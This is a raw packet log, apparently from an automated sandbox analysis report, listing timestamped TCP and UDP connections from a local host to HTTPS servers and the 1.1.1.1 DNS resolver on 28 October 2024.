                                                                                                                                                                            Oct 28, 2024 19:13:08.680406094 CET4435930013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795485020 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795491934 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795511007 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795514107 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795528889 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795532942 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795619965 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.795625925 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.795650005 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795661926 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.795725107 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.795752048 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.800499916 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.800565958 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.800573111 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.800586939 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.800643921 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.800780058 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.800795078 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.805793047 CET59301443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.805830002 CET4435930113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.805883884 CET59301443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.806231022 CET59301443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.806242943 CET4435930113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.811259985 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.811300993 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.811336040 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.811357021 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.811419964 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.811419964 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.823005915 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.823005915 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.823055983 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.823100090 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.834357023 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.834441900 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.834515095 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.836600065 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.836630106 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.914966106 CET59303443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.915004969 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.915064096 CET59303443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.915189028 CET59304443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.915208101 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.915260077 CET59304443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.915466070 CET59303443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.915478945 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.915761948 CET59304443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:08.915776014 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.033245087 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.033811092 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.033865929 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.034411907 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.034425020 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.040611982 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.041022062 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.041040897 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.041613102 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.041616917 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.174283028 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.174318075 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.174381971 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.174385071 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.174433947 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.174710989 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.174751043 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.174777985 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.174793005 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.177534103 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.177555084 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.177608013 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.177623034 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.177659035 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.177817106 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.177834034 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.177849054 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.177855015 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.177968979 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.178008080 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.178066969 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.178195000 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.178209066 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.180155039 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.180227995 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.180284977 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.180433035 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.180458069 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.445590973 CET4435930013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.446158886 CET59300443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.446204901 CET4435930013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.446563005 CET59300443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.446568966 CET4435930013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.523032904 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.523257971 CET59303443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.523274899 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.523606062 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.523921967 CET59303443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.523981094 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.529184103 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.529490948 CET59304443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.529516935 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.529987097 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.530281067 CET59304443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.530364037 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.560710907 CET4435930113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.561258078 CET59301443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.561264992 CET4435930113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.563020945 CET59301443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.563024998 CET4435930113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.572644949 CET59303443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.572645903 CET59304443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:09.585978031 CET4435930013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.586061001 CET4435930013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.586319923 CET59300443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.586319923 CET59300443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.586410999 CET59300443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.586462975 CET4435930013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.589104891 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.589195013 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.589318037 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.589456081 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.589462042 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.590823889 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.591636896 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.591636896 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.591659069 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.591694117 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.700372934 CET4435930113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.700505972 CET4435930113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.700738907 CET59301443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.700738907 CET59301443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.700767994 CET59301443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.700781107 CET4435930113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.703715086 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.703753948 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.703905106 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.704046965 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.704058886 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.979263067 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.979337931 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.980123043 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.980123043 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.980123997 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.982918978 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.982947111 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:09.983088017 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.983238935 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:09.983253002 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.116391897 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.118535995 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.118557930 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.118614912 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.118623018 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.120059013 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.120634079 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.120671988 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.123025894 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.123034000 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.197643995 CET59302443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.197714090 CET4435930213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.255160093 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.255238056 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.255383015 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.255544901 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.255544901 CET59306443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.255559921 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.255568981 CET4435930613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.256673098 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.256745100 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.256858110 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.256906986 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.256970882 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.256970882 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.257009029 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.257045031 CET59307443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.257061005 CET4435930713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.258644104 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.258690119 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.258857012 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.258979082 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.259006977 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.353194952 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.353740931 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.353786945 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.354187012 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.354191065 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.471467972 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.471968889 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.471993923 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.472476006 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.472481012 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.491530895 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.491631031 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.491779089 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.491837025 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.491851091 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.491862059 CET59308443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.491866112 CET4435930813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.615745068 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.615825891 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.615891933 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.616117001 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.616137028 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.616142988 CET59310443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.616147041 CET4435931013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.740515947 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.741049051 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.741072893 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.741513014 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.741517067 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.901302099 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.901381016 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:10.901506901 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.901757002 CET59311443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:10.901772022 CET4435931113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.033288956 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.033816099 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.033847094 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.034271955 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.034284115 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.173716068 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.173867941 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.173955917 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.174067974 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.174099922 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:11.174124002 CET59312443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:11.174139023 CET4435931213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.580668926 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.580770969 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.580827951 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:22.581038952 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.581120014 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:22.581182957 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:24.402502060 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:24.402575970 CET44359303162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:24.402638912 CET59303443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:24.403019905 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:24.403116941 CET44359304162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:24.403255939 CET59304443192.168.2.4162.159.61.3

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Oct 28, 2024 19:11:31.024566889 CET5157653192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:11:31.031095028 CET5690053192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:11:31.034113884 CET53515761.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:11:31.037179947 CET6074253192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:11:31.047364950 CET53607421.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:11:31.068006039 CET53569001.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:11:39.534620047 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                            Oct 28, 2024 19:12:00.449661970 CET53595721.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:00.478472948 CET53562541.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:02.096548080 CET53508491.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:12.660753012 CET53620651.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.237811089 CET53526311.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.239463091 CET53594481.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.300579071 CET53530571.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.145174980 CET6272153192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:48.145471096 CET5380053192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:48.152749062 CET53627211.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.153633118 CET53538001.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.327003956 CET53609901.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.605990887 CET5385553192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:51.606127024 CET5449253192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:51.606563091 CET5307753192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:51.606736898 CET5960453192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:51.613410950 CET53538551.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.613573074 CET53544921.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.614186049 CET53596041.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.614321947 CET53530771.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.800295115 CET6426053192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:51.803967953 CET5495053192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:51.808140993 CET53642601.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.811233044 CET53549501.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.280384064 CET53644931.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.091459990 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.703684092 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.706444025 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.706598043 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.706667900 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.771847010 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.772353888 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.773370028 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.773730040 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.775288105 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.775537968 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.902520895 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904433966 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904467106 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904500961 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904527903 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904555082 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.904814959 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.904908895 CET54985443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.907526016 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.909236908 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.912955046 CET44354985162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.913145065 CET54985443192.168.2.4162.159.61.3
